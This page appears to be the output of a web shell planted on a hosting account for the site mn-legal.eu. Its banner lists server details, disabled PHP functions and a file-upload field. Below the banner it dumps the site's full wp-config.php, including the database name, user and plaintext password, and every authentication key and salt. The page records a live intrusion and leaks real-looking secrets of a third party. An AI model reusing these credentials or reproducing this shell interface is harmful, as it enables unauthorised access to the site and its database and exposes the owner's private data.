| Server IP : 93.185.101.40 / Your IP : 216.73.217.46 Web Server : Apache/2.4 System : Linux hosting5.default.cz 4.18.0-553.6.1.el8.x86_64 #1 SMP Thu May 30 04:13:58 UTC 2024 x86_64 User : webmaster ( 1003) PHP Version : 8.4.11 Disable Function : exec, system, shell_exec, passthru, proc_open, popen, expect_popen, putenv, dl, show_source, highlight_file, symlink, link, socket_create, socket_connect, pfsockopen, pcntl_exec, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/www/mn-legal/www/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'mn_legal' );
/** Database username */
define( 'DB_USER', 'mnlegal' );
/** Database password */
define( 'DB_PASSWORD', 'Pifir402' );
/** Database hostname */
define('DB_HOST', 'localhost');
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '9DC?su.OC>)1sydF` L[:~f8)td^0e+c##U?4E*/9qO^|<TVfk}LMq4+H5S%]Z}e' );
define( 'SECURE_AUTH_KEY', 'wd_PEfs:hUm`S(3DS*q}jUpT^>Vg$f*;:wA*B ^#,)G#F2g<vblH%#hu-&6EWQxI' );
define( 'LOGGED_IN_KEY', 'orjK0i/JMsY*U:Q<@;quMiQ$fab)GKS7f5w6seC}1j2_7?>pS|2<t&2qBY++L3S1' );
define( 'NONCE_KEY', 'L^H-Ao]:x%p`h?&uXe,kB{W9}g*&,z]LC/ GRH$#mr,|0o|@vwC76.,nBjPYWe&)' );
define( 'AUTH_SALT', 'f`w K8_]<z*fn3>5OsT$N{Bl4R*VR*gkg!vS#shOZo7#>A5_!AURjT$]8&U({J^C' );
define( 'SECURE_AUTH_SALT', '`b!`ojhcfRE*pN$7^!}mcdIW,,05PB]Q9RO6&*ZJ{-yLj!o?C%$_.iVKI)e$C/&D' );
define( 'LOGGED_IN_SALT', 'MsicR=,yPd>KeY.2~D:1HUa3OmLO479G? }:i0BAsOb0:P^Y4w5;2:/H$wPDPY)x' );
define( 'NONCE_SALT', 'zuuz6T]@,wjd^cdWN>V<dZvFYkecU:jsnax2jgamH;W#bgh> r?vJC/g C=Avu)@' );
define( 'WP_CACHE_KEY_SALT', 'TQpv7>4J$^Od0@fdXUzC< #(NJcq::39?Gcobl8#1My|v^++&{)l{x*Mjwr-S }W' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/* Add any custom values between this line and the "stop editing" line. */
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
define( 'WP_HOME', 'https://mn-legal.eu' );
define( 'WP_SITEURL', 'https://mn-legal.eu' );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';